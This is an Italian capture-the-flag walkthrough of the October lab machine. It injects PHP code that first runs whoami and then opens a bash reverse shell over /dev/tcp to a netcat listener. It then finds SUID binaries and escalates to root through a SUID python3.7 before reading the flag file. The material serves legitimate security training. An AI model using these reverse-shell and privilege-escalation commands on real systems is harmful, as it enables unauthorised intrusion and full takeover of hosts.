HackingLab – It’s October 1

Tramiteil tool è possibile caricare contenuti, con l’aggiunta di codice php.

Aggiungiamo il seguente codice per verificare l’esecuzione di codice php; nello specifico il comando whoami.

function onstart()
{
    system("whoami");
}

Accedendo alla pagina http://192.168.188.65/exploit possiamo vedere la stringa whoami a dimostrazione del fatto che il codice inserito viene correttamente eseguito.

Sostituiamo lo script di prima con uno script che ci permette di ottenere una shell.

function onstart()
{
    exec("/bin/bash -c 'bash -i > /dev/tcp/192.168.188.75/4545 0>&1'");
}

Ci mettiamo in listening sulla porta 4545 con il comando nc secondo la sintassi: nc -vlp <PORTA>.
Dal browser accediamo ancora una volta alla pagina che contiene lo script ed otteniamo una shell.

kali@kali:~$ nc -lvp 4545
listening on [any] 4545 ...
connect to [192.168.188.75] from october.fritz.box [192.168.188.65] 57750
whoami
www-data

Verifichiamo con il comando find quali comandi possono essere eseguiti con privilegi suid utilizzando la sintassi find / -perm -u=s -type f 2>/dev/null. Troviamo tra i comandi python3.7.

find / -perm -u=s -type f 2>/dev/null
/usr/bin/newgrp
/usr/bin/su
/usr/bin/python3.7m
/usr/bin/passwd
/usr/bin/chfn
/usr/bin/chsh
/usr/bin/mount
/usr/bin/umount
/usr/bin/python3.7
/usr/bin/gpasswd
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/lib/dbus-1.0/dbus-daemon-launch-helper

Otteniamo una shell eseguendo lo script python python3.7 -c ‘import pty;pty.spawn(“/bin/bash”)’

python3.7 -c 'import pty;pty.spawn("/bin/bash")'
bash-5.0$ whoami
whoami
www-data
bash-5.0$ id
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
bash-5.0$ 

Utilizziamo uno script python per ottenere un accesso root.

python3.7 -c 'import os; os.execl("/bin/sh", "sh", "-p")'
# whoami
whoami
root
# 

Accediamo alla directory /root ed otteniamo la bandiera.

# cd /root
cd /root
# ls -al
ls -al
total 72
drwx------  6 root root  4096 Mar 27 10:54 .
drwxr-xr-x 18 root root  4096 Mar 25 03:26 ..
-rw-------  1 root root     7 Mar 27 10:54 .bash_history
-rw-r--r--  1 root root   570 Jan 31  2010 .bashrc
drwxr-xr-x  3 root root  4096 Mar 27 06:47 .config
drwx------  3 root root  4096 Mar 27 06:06 .gnupg
-rw-r--r--  1 root root  1808 Mar 27 06:54 .htaccess
-rw-------  1 root root   115 Mar 27 09:40 .mysql_history
-rw-r--r--  1 root root   148 Aug 17  2015 .profile
-rw-------  1 root root    24 Mar 27 10:28 .python_history
drwxr-xr-x  2 root root  4096 Mar 25 04:30 .ssh
drwxr-xr-x  2 root root  4096 Mar 27 09:49 .vim
-rw-------  1 root root 13604 Mar 27 10:54 .viminfo
-rw-r--r--  1 root root   209 Mar 27 09:46 .wget-hsts
-rw-r--r--  1 root root    74 Mar 27 10:50 proof.txt
# cat proof.txt
cat proof.txt
Best of Luck
$2y$12$EUztpmoFH8LjEzUBVyNKw.9AKf37uZWPxJp.A3eop2ff0LbLYZrFq

Leave a Reply

Your email address will not be published. Required fields are marked *